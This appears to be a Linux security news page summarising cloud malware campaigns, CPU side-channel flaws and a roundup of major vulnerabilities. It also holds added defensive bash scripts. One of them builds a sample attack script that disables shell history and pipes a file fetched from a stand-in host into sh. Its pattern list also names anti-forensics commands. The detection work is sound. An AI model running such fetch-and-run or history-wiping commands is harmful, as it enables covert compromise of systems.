
Stay Ahead With Linux Security News



Explore Latest Linux Security news


Cloud Threat Advisory: Docker, Hadoop, Confluence, Redis Cryptomining Risks

A recent attack campaign targeted publicly accessible Docker, Hadoop, Confluence, and Redis deployments. The attackers exploited misconfigurations and known vulnerabilities to implant cryptominers on compromised systems. As Linux admins, infosec professionals, Internet security enthusiasts, and sysadmins, it is crucial to understand the implications of this attack and take appropriate measures to protect our systems.

What Is the Significance of This Cloud Security Threat?

This campaign is unusual in deploying previously unseen payloads, including four binaries written in Golang. The attackers exploit common misconfigurations and vulnerabilities to gain initial access, then employ a series of shell scripts and Linux attack techniques to establish persistence and deliver a cryptocurrency miner. This level of sophistication raises questions about the attackers' resources and intentions.

The complexity of the infection chain is also notable. It involves over 10 shell scripts, binaries, persistence mechanisms, backup payload delivery methods, anti-forensics techniques, and user-mode rootkits. This demonstrates the effort attackers are willing to put into compromising systems. As security practitioners, we must be aware of threat actors' evolving tactics and techniques and continuously adapt our defense strategies.

An intriguing aspect of this attack is the use of the shopt builtin in the shell scripts to stop subsequent commands from being written to the shell history file. This anti-forensics technique hides the attackers' activity from anyone who later reviews the history. Such techniques had not been observed in other campaigns, which points to the constant innovation and evolution of malware. Are other attackers using similar methods, and how can we detect and defend against them?

This attack has significant implications for Linux users. It highlights the importance of regularly patching vulnerabilities and correcting insecure configurations in Docker, Hadoop, Confluence, and Redis deployments. Additionally, it emphasizes the need for ongoing monitoring and threat intelligence to detect and respond to such attacks promptly.

The long-term consequences of this attack are concerning. It raises questions about the overall security posture of cloud environments and the inherent risk of exposing web-facing services to the Internet. As more organizations move to cloud-based deployments, the potential for attacks targeting these environments increases. Security practitioners must stay informed about reported vulnerabilities in cloud services and implement robust security measures.

Our Final Thoughts on This Recent Attack

This article serves as a wake-up call for Linux admins. The targeted attack campaign discussed here demonstrates threat actors' evolving tactics and techniques. It underscores the importance of maintaining strong security practices, regularly patching vulnerabilities, and continuously monitoring and adapting defense strategies. By staying informed, proactive, and vigilant, we can mitigate the risks posed by such attacks and protect our systems from compromise.

Mar 08, 2024 | Brittany Day | Cloud Security
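Two things a defender would want to check after reading the above: whether a shell script on a host uses the history-suppression trick the article describes, and whether the services this campaign scanned for are reachable on all interfaces. The following bash snippet is an added example, not code from the article or from the campaign itself. The pattern list (shopt -ou history is the bash idiom for turning history off from inside a script; the others are common equivalents), the port list for Docker, Redis, Hadoop YARN and Confluence, and the sample script are assumptions constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example (not from the original article or the campaign's own code):
# 1. flag history-suppression idioms in a shell script (the anti-forensics
#    technique described above);
# 2. flag the admin/API ports the campaign targeted when they are bound to
#    all interfaces in a captured "ss -ltn" listing.

# ERE patterns that stop commands from reaching the shell history file.
# "shopt -ou history" and "set +o history" are the bash idioms; the rest are
# common equivalents. Assumption: a starter list, not an exhaustive signature set.
HISTORY_SUPPRESSION_PATTERNS='shopt -ou history|set \+o history|unset HISTFILE|HISTFILESIZE=0|HISTSIZE=0|history -c|ln -sf? /dev/null .*bash_history'

# Print matching lines (with line numbers) from the script given as $1.
# Exit status 0 if anything matched, 1 otherwise (grep's own semantics).
find_history_suppression() {
    grep -nE "$HISTORY_SUPPRESSION_PATTERNS" "$1"
}

# Number of matching lines; useful as a threshold in a scheduled scan.
count_history_suppression() {
    grep -cE "$HISTORY_SUPPRESSION_PATTERNS" "$1" || true
}

# Read "ss -ltn" output on stdin (State Recv-Q Send-Q Local:Port Peer:Port ...)
# and print an EXPOSED line for each wildcard-bound listener on a port the
# campaign hunted for. Port list is an assumption: Docker API 2375/2376,
# Redis 6379, Hadoop YARN ResourceManager 8088, Confluence 8090.
flag_exposed_listeners() {
    awk '
    NR == 1 && $1 == "State" { next }          # skip the header line
    {
        addr = $4
        n    = split(addr, parts, ":")
        port = parts[n]
        host = substr(addr, 1, length(addr) - length(port) - 1)
        if ((host == "0.0.0.0" || host == "*" || host == "[::]") &&
            (port == 2375 || port == 2376 || port == 6379 ||
             port == 8088 || port == 8090))
            print "EXPOSED " host ":" port
    }'
}

# Constructed sample script for the demonstration (not a real payload).
make_sample_script() {
    cat > "$1" <<'EOF'
#!/bin/bash
shopt -ou history
unset HISTFILE
export PATH=/tmp:$PATH
curl -s http://example.invalid/x.sh | sh
EOF
}

# Usage on a live host:
#   find_history_suppression /tmp/suspicious.sh
#   ss -ltn | flag_exposed_listeners
```

On a real host, feed `flag_exposed_listeners` with `ss -ltn` output; for a captured listing from an incident, pipe the saved file in instead. A hit from `find_history_suppression` in a script dropped into /tmp or a cron directory is a strong pivot point for the rest of the infection chain the article describes.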

Intel and AMD Processors Data Risk: Downfall and Zenbleed Threats

[BLACK HAT] Googlers have lately found not one but two more security vulnerabilities in Intel and AMD processors that can be exploited to steal sensitive data from a vulnerable computer's memory.

Specifically, there is one flaw in Intel components and one in AMD. Both can be abused by malware running on a system, or by a rogue logged-in user, to lift passwords, secrets, and other data out of memory that should be off limits. This should concern anyone who uses shared servers in the cloud, where the attacker may be nothing more than another tenant scheduled on the same physical CPU.

The Intel vulnerability, found by Daniel Moghimi and dubbed Downfall, was addressed on Tuesday, nearly a year after its private disclosure. The AMD vulnerability, found by Tavis Ormandy and named Zenbleed, was patched, to a degree, in July after being reported privately in mid-May, as we previously covered.

Aug 14, 2023 | Brittany Day | Organizations/Events

Hive Ransomware Targets Linux and FreeBSD Cloud Applications

Linux and FreeBSD variants of the Hive ransomware have recently been discovered, demonstrating that threat actors are increasingly targeting operating systems besides Windows and are looking to attack cloud apps.

In a tweet on Friday, ESET researchers reported that, like the Windows version, the Linux and FreeBSD variants are written in Golang, but the strings, package names, and function names have been obfuscated, likely with gobfuscate, which lets developers compile a Go binary from obfuscated source code.

"This new discovery from ESET clearly shows that attackers are thinking about Linux and cloud environments, many of which operate on Linux," said John Bambenek, principal threat hunter at Netenrich.

Nov 02, 2021 | MaK Ulac | Cloud Security

Top Cloud Security Threats Facing Linux Operating Systems Today

Linux is growing in popularity due to the impressive security, stability, and flexibility of the OS, making it an increasingly attractive attack target. Learn about the top cloud security threats to your Linux system.

Many regard Linux as the most secure operating system due to its stability, flexibility, and open-source nature. Linux is also powerful and dependable when it comes to performance and efficiency. It has proven itself by remaining the only operating system used on all of the world's top 500 supercomputers, and it supports nontraditional IT applications such as heavy machinery control, robotics, high-speed trains, and even major space programs. In an increasingly cloud-centric world, Linux lets organizations get the most out of their cloud-based environments and power their digital strategies.

But this success has a downside: with Linux an increasingly popular choice for businesses, it is now a major target for cybercriminals looking for holes in its security. Cybersecurity company Trend Micro released a new research report that sheds light on the current state of Linux security. The report provides several valuable insights and focuses on vulnerability distribution, major threats, and security drawbacks of the Linux operating system. It is especially eye-opening for those who mistakenly believe Linux is invulnerable to attacks.

Sep 03, 2021 | Anthony Pell | Cloud Security

Updated Pro-Ocean Malware Targets Apache, Oracle And Redis Privacy Issues

The evasive new Pro-Ocean cryptojacking malware is sidestepping security defenses and targeting Apache, Oracle, and Redis servers.

A financially motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of its malware to target cloud infrastructure using vulnerabilities in web server technologies, according to new research. Deployed by the China-based cybercrime group Rocke, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers said in a Thursday write-up.

"Pro-Ocean uses known vulnerabilities to target cloud applications," the researchers detailed. "In our analysis, we found Pro-Ocean targeting Apache ActiveMQ (CVE-2016-3088), Oracle WebLogic (CVE-2017-10271) and Redis (unsecure instances)."

The link for this article located at The Hacker News is no longer available.

Feb 01, 2021 | LinuxSecurity.com Team | Hacks/Cracks

Exploring Major Security Threats Affecting IT Systems In The Last Decade

Thank you to Skynats for contributing this article. This past decade has been plagued with security vulnerabilities. Let's have a look at the top vulnerabilities that have recently crippled the IT world.

Badlock: Badlock is a serious security bug affecting Windows computers and Samba servers, tracked as CVE-2016-0128 (Microsoft) and CVE-2016-2118 (Samba). Weaknesses in the RPC services allowed a man-in-the-middle attacker to intercept the communication between a client and a server hosting a SAM database, force the authentication level to downgrade, and gain access to the SAM database.

BlueBorne: BlueBorne is a set of vulnerabilities in Bluetooth implementations that, in effect, spreads through the air: an attacker in radio range can seize control of a device without pairing and without user interaction. Everything from smartphones to TVs, computers, smart cars, and laptops has Bluetooth enabled and active almost all the time, leaving those devices exposed to malware that can take them over remotely.

Cloudbleed: This was another leading cloud-based security vulnerability, affecting Cloudflare's reverse proxies, and was discovered on February 17, 2017. Many of the busiest websites and apps rely on Cloudflare's protection. The bug caused Cloudflare's edge servers to run past the end of a buffer and return memory that contained private information such as:
1. HTTP cookies
2. Authentication tokens
3. HTTP POST bodies
4. Other sensitive data
The worst part was that some of this data was cached by search engines.

Dirty COW: This was a serious flaw in the way the Linux kernel's memory subsystem handled copy-on-write (COW). It affects Linux-based OSes, including Android devices, running kernels that predate the fix released in October 2016. Dirty COW is a local privilege escalation bug that exploits a race condition in the copy-on-write mechanism. Systems still running an older kernel remain vulnerable, and any local user can become root in seconds. Exploitation does not by itself leave entries in the system logs, so you cannot tell from the logs alone whether someone has used it against your server.

Foreshadow: This bug (L1TF, or Foreshadow), affecting Intel processors, gives attackers unprecedented access to sensitive information stored on personal computers and cloud servers. Foreshadow has two versions: the original attack, which extracts data from SGX enclaves, and the next-generation variant, which targets virtual machines (VMs), hypervisors (VMMs), OS kernel memory, and System Management Mode (SMM) memory. Foreshadow is related to the Spectre bug, which affects Intel and AMD chips, and to the Meltdown bug, which also affects Intel. Software patches mitigate much of the risk, but users may see a considerable drop in overall PC or server performance as a result.

Heartbleed: Heartbleed is a serious vulnerability in the popular OpenSSL cryptographic library, widely used in implementations of the Transport Layer Security (TLS) protocol. It was publicly disclosed in April 2014.

iSeeYou: This is a vulnerability in Apple's iSight webcam that allows the camera to be activated silently by malware. Because the flaw lives in the camera hardware and firmware, affected Apple laptops are exposed whichever operating system they run, including macOS, Microsoft Windows, and Linux. Researchers released iSightDefender, a macOS kernel extension that reduces the attack surface under macOS.

KRACK: The Key Reinstallation Attack is a replay attack on the Wi-Fi Protected Access (WPA) protocol used to secure Wi-Fi connections. It was discovered in 2016 by Belgian researchers. All the major software platforms that use WPA are affected, including Microsoft Windows, macOS, iOS, Linux, Android, and OpenBSD.

Lazy FP: Lazy, also referred to as Lazy FP State Restore or LazyFP, is a security vulnerability affecting Intel CPUs. It arises from lazy floating-point context switching combined with speculative execution, and can be used to leak the contents of the FPU registers belonging to another process. Lazy FP is related to the Spectre and Meltdown vulnerabilities, which were publicly disclosed in January 2018.

Linux.Encoder: This is considered the first ransomware Trojan targeting computers and cloud servers running Linux. It was discovered on November 5, 2015, and additional variants target other UNIX and UNIX-like systems.

Meltdown: Meltdown is a severe security vulnerability found in most CPUs used in modern devices; mobile phones, laptops, desktops, and Internet of Things (IoT) devices are all affected. Meltdown breaks the fundamental isolation between user applications and the operating system, allowing a rogue process to read the memory of other programs and of the OS. It primarily affects Intel microprocessors but also affects the ARM Cortex-A75 and IBM's POWER microprocessors. It does not affect AMD CPUs.

Microarchitectural Data Sampling: The MDS vulnerabilities are a set of weaknesses in Intel x86 microprocessors that use hyper-threading to leak data across protection boundaries that are architecturally supposed to be secure. After Meltdown, Spectre, and Foreshadow, MDS is considered one of the most critical vulnerability classes in modern processors. The attacks exploiting these flaws have been labeled Fallout, RIDL (Rogue In-Flight Data Load), and ZombieLoad, and they allow attackers to steal sensitive data and keys.

Have another vulnerability that you feel belongs on this list? Please do not hesitate to reach out and let us know!

Jan 14, 2021 | Brittany Day | Security Vulnerabilities
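For the CPU side-channel entries in the list above (Meltdown, Foreshadow/L1TF, MDS) and for the Downfall flaw covered earlier on this page, the Linux kernel publishes its own mitigation status under /sys/devices/system/cpu/vulnerabilities/, one file per issue, each holding a line that starts with "Not affected", "Mitigation:" or "Vulnerable". The script below is an added example, not from the article or its contributor: it summarises those files and, importantly, treats a missing file as unknown rather than safe, since not every issue gets a sysfs entry and an older kernel will not know about newer flaws. The directory is a parameter so it can be run against the constructed snapshot included here; the entry names are the kernel's, the list of which ones to check is an assumption.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): summarise the kernel's
# CPU-vulnerability status files. Each file under
# /sys/devices/system/cpu/vulnerabilities/ holds one line beginning with
# "Not affected", "Mitigation:" or "Vulnerable". The directory is a
# parameter so the functions can run against a constructed copy.

# Entries to check. Assumption: the subset a cloud tenant sharing a CPU
# would care about, not the kernel's complete list.
EXPECTED_VULNS="meltdown l1tf mds gather_data_sampling spectre_v1 spectre_v2"

# Print one line per expected entry: VULNERABLE, MITIGATED, NOT_AFFECTED or
# UNKNOWN. UNKNOWN covers a missing file (older kernel, or an issue not
# tracked in sysfs) and must not be read as "safe".
report_cpu_vulns() {
    local dir=$1 name status
    for name in $EXPECTED_VULNS; do
        if [ ! -r "$dir/$name" ]; then
            printf 'UNKNOWN %s (no sysfs entry)\n' "$name"
            continue
        fi
        status=$(head -n 1 "$dir/$name")
        case $status in
            Vulnerable*)     printf 'VULNERABLE %s: %s\n' "$name" "$status" ;;
            Mitigation*)     printf 'MITIGATED %s: %s\n' "$name" "$status" ;;
            "Not affected"*) printf 'NOT_AFFECTED %s\n' "$name" ;;
            *)               printf 'UNKNOWN %s: %s\n' "$name" "$status" ;;
        esac
    done
}

# Number of VULNERABLE entries. Non-zero means the host needs microcode or
# a kernel update before it should host untrusted tenants.
count_vulnerable() {
    report_cpu_vulns "$1" | grep -c '^VULNERABLE' || true
}

# Constructed sysfs snapshot for the demonstration (not from a real host).
# spectre_v2 is deliberately omitted to exercise the UNKNOWN path.
make_sample_sysfs() {
    mkdir -p "$1"
    echo 'Vulnerable: No microcode' > "$1/gather_data_sampling"
    echo 'Mitigation: PTI' > "$1/meltdown"
    echo 'Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable' > "$1/l1tf"
    echo 'Not affected' > "$1/mds"
    echo 'Mitigation: usercopy/swapgs barriers and __user pointer sanitization' > "$1/spectre_v1"
}

# Usage on a live host:
#   report_cpu_vulns /sys/devices/system/cpu/vulnerabilities
#   [ "$(count_vulnerable /sys/devices/system/cpu/vulnerabilities)" = 0 ]
```

Run the live form on every hypervisor and on any VM that runs code from more than one trust domain; in the VM the status reflects what the hypervisor exposes to the guest, so an all-clear inside a guest does not by itself prove the host is patched.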

Docker Security Insights: Malware Threats and Developer Responsibilities

Three years after the first malware attacks targeting Docker, developers are still misconfiguring and exposing their Docker servers online. Docker malware is now common, making this lackadaisical attitude toward Docker security increasingly problematic.

Towards the end of 2017, there was a major shift in the malware scene. As cloud-based technologies became more popular, cybercrime gangs also began targeting Docker and Kubernetes systems. Most of these attacks followed a very simple pattern: threat actors scanned for misconfigured systems that had admin interfaces exposed online, took over the servers, and deployed cryptocurrency-mining malware. Over the past three years these attacks have intensified, and new malware strains and threat actors targeting Docker (and Kubernetes) are now being discovered on a regular basis.

Dec 01, 2020 | LinuxSecurity.com Team | Server Security

Understanding Cloud Threats: Hacking Strategies for Secure Data

If Willie Sutton had been a hacker, we know what he. But how much loot will modern-day Willie Suttons really be able to plunder from the cloud?

Cloud environments are prime targets for hackers due to issues like misconfigurations and weak APIs. Strong access controls, audits, and employee training are crucial for risk mitigation.

Oct 14, 2010 | LinuxSecurity.com Team | Hacks/Cracks